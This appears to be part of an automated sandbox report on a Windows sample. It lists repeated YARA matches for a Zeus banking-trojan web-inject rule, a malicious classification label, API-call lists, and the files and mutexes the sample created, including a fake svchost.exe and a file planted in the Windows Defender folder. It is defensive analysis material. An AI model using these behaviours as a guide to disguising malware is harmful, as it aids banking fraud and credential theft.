Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2757164455.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2775825052.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2776041284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2790907170.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2794030784.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2774710797.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2170461210.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2792838901.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2773445866.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2791900704.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2789409871.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2784224437.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2790002799.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2810131303.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2707114238.0000000003C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2678865886.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6912, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2268, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6628, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3896, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6212, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: UMwpXhA46R.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@13/61@2294/28
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00401C70 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401C70
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00402560 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402560
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vonypom.comJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[1].htmJump to behavior
Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3472
Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\80F500EBa
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3416
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3328
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6628
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2948
